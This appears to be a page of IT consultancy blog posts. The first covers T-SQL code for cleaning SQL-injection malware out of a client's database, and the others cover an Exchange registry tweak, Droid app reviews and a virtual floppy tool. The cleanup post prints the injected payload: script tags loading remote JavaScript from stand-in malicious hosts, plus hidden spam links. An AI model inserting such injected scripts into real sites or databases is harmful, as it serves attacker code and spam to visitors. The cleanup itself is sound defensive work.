Got a call today off our previous article in this series from Branden of Hot Media Group, Inc., aChicago-based web application development, networking, and graphic design firm who found himself with a database full of malware infections, but the characteristics of his attack didn't match what we had written about, so he called us up. We reviewed his symptoms and were able to tweak the code we provided previously to work with this new set of issues.

We weren't able to see how the site was attacked, nor did we worry about how the site would be steeled against future occurrence (always use stored procedures and/or parametrized queries, kids!) -- this was purely a cleanup job.

This is the code we had:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
PRINT ('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'],'''', '''')') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND b.xtype=99 OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN PRINT ('UPDATE ['+@T+'] SET ['+@C+']=cast(replace(cast(['+@C+'] as nvarchar(4000)),'''','''') as ntext)')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

And that worked fine, but it had some shortcomings -- mostly it only stripped out a single bit of invasive code, and our new friend had quite a bit of code to deal with, so instead of the almost quaint looking malware code:

<script src="hxxp://evilsite.evl/b.js"></script>

We had this jumble of code in every ntext field in his database:

<script type='text/javascript' src='http://google-anallytics.bad/urchin.js'></script>
<div style='display:none;'><a href='http://tests4all.bad/1/'>journals on losing post-pregnancy weight</a>
<a href='http://tests4all.bad/2/'>personal trainer certification atlanta</a>
<a href='http://tests4all.bad/3/'>quit smoking water vapor rings</a>
<a href='http://tests4all.bad/4/'>eyes in the darkness</a>
<a href='http://tests4all.bad/5/'>cheated map on dota 6.54b</a>
<a href='http://tests4all.bad/6/'>occupations for bored teen boys</a>
<a href='http://tests4all.bad/7/'>cgw southeast partners ilp</a>
<a href='http://tests4all.bad/8/'>does iq tests accurately measure intelligence</a>
<a href='http://tests4all.bad/9/'>free total psychic reading</a>
<a href='http://tests4all.bad/10/'>minnesota past life regression</a>
<a href='http://tests4all.bad/11/'>date of abraham lincolns death</a>

After trying to figure out the best way to escape all the single quotes, Branden -- an accomplished ColdFusion developer -- suggests "why don't we just drop everything to the right of the <script> tag?"
Read the rest of this entry »

I keep coming up against this, and I keep forgetting it, so I figured I'd write it down here for all of our benefit.

Exchange 2003 allowed us to easily mail enable public folders, so something sent to info@domain.invalid would go to a public folder where any number of staff could monitor the mailbox.

However, by default, the mail is stored in the Public Folder as a NOTE and not an E-MAIL (for the geeks in the audience IPM.POST vs. IPM.NOTE)

To make the public folder store incoming mail as emails, we need to make a quick registry change. This is all outlined in MS KB 817809.

Go to

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MSExchangeIS\<ServerName>\Public-<GUID>

And create (or edit) the key:

Value name: Incoming defaults to IPM.Note
Value type: DWORD
Value data: 1

Setting the value to 1 (true) stores things as IPM.NOTE (which is what we want). Setting the value to 0 sets it back to saving things as a post.

So, I'm not a gigantic app person -- my iPod Touch has the essentials for what I need, a few cutsey show-off things or games for the kids, so I figured I'd do the same with my Droid... yes and no. Here's a rundown of whats on my Droid right now, and what I think:

Alarmed Light - Used it because it has a feature where you're forced to answer math questions to turn the alarm off. Kinda forces you to shake the cobwebs out and get started.

Aloqa - Cool app that uses your GPS to let you know what's around. It's integrated with Yelp for food ratings. It has icons on its main screen for "Hot" (whatever that means), Yelp Restaurants, Coffee, last.fm, Music (showing me concerts in Denmark?!?), Playing Tonight (movies), Yelp Bars & Clubs, Real Estate, Wikipedia, ATMs, Pizza, Aloqa, Yelp Fast Food and then "Add more channels." It more or less does what it is supposed to; it's nice to look at.

BeamReader - a PDF viewer. I should uninstall since I bought "Documents to Go"

Bubble Burst Lite -- Windows Mobile Jawbreaker for the Droid.

ConnectFour - decent enough implementation. AI seems a little stupid sometimes.

Documents to Go - open Word, Excel, Powerpoint, PDF. Does good job at rendering PDFs.

Flashlight - turns your screen white. Doesn't seem to adjust for maximum brightness. Passable.

Flickr Droid - Droid needs a good Flickr app. This isn't it, but the best one I could find that uses the Flickr API to let me at my stuff, since a lot of my photostream is friends/family only.

FlightStats Lite - haven't had a chance to play with this. Will in January as I head to CES.

Goggles - Google's latest toy. Varies from wildly successful to "how did you not recognize the Pepsi logo?!?"

GPS Status - essentially a digital compass. Used when I was troubleshooting GPS on the phone.

Flixter Movies - quick and easy to get to where we have to go for Friday Morning Movie Club.

NYC Bus and Subway Map - not as interactive as I'd like. Literally a HiDef graphic of the map, and you can click thru to the MTA website for further details on the lines.

OpenTable - online restaurant reservations from opentable.com . Decent.

Pandora - works well over 3G, tho I imagine it eats thru the quota pretty quick.

PicSay Lite - dopey photo editing thing. Makes speech baloons. Don't know why I downloaded this.

Poke a Mole - whack-a-mole for the phone. Fun game with a Giant Downside - even when phone is muted annoying background music plays. Have to go into game menu to mute it.

Remote RDP Demo - eventually I'll need to really use function keys when I Remote Desktop into a machine from my phone, but until then, the demo version does the trick.

Robo Defense FREE - I do enjoy the tower defense genre of casual gaming... so why not have it on my phone? (Hardly never play it. Seemed like a good idea.)

Shazam - this app still amazes me. Where did they get that song database???

Stopwatch - straightforward.

Sudoku Free - seeing it in my list makes me feel smart until I play it, thenI feel dumb.

The Weather Channel - it has a widget so I can glance at the home screen to see what it's going to be like... or rather I can look at the home screen and tell my wife what it's going to be like... (I had a weather widget on the Treo and missed it.)

TivoRemote - control the Tivo over WiFi. Nice, especially for text entry. The iPhone's version is better.

TRAFFIC! - A test app for me. Not in love.

Trap! - Another game, but its "draw a line" technology gets in the way of gameplay. Fun when it does what you want.

Tunes Remote - Control iTunes from the Droid. YAY! One of the big reasons I got the iPhone touch was to control the iTunes machine hooked to the outdoor speakers.

Twidroid Pro - From what I understand, the best Twitter client for the Droid. I'm happy with it. Does everything I need, but I am far from a Twitter power user, so some might find it lacking. They constantly update it which seems like they're interested developers.

US Traffic - Another traffic app that I tried before I realized Google Maps had a Traffic layer...

wpToGo - Allows me to post to WordPress from the phone... tho I have not had the need to do so.

What have I missed?

A client has an oldish Dell Dimension 8400 with an Intel RAID card that requires you to "Press F6 to add Storage Drivers" when trying to repair Windows. This also means that UBCD4Win (my preferred repair tool) also doesn't recognize the drives.

Happily, Dell has a set of the drivers available.

Sadly, they're part of a floppy image.

Grrr!

Enter Virtual Floppy Drive 2.1, a cool piece of shareware that can be glommed from http://chitchat.at.infoseek.co.jp/vmware/vfd.html

This operates along the same line as Microsoft's Virtual CD-ROM Control Panel for Windows XP, which mounts an ISO image and has it appear as a drive letter.

VFD does the same thing, it mounts an image file (or just creates a small chunk of RAM and treats it like a blank floppy) and you assign it a drive letter.

I loaded the application up -- it's pretty self-explanatory -- assigned to Drive B: and then launched Dell's Floppy making utility, told it to write to Drive B and bingo! I had my extracted files.

From there, it was trivial to copy them to the appropriate install media and we were off to the races.

(I finally searched for a virtual solution, when the one floppy disk I could find was throwing errors. How happy are we that those things have (mostly) gone the way of the dinosaur?)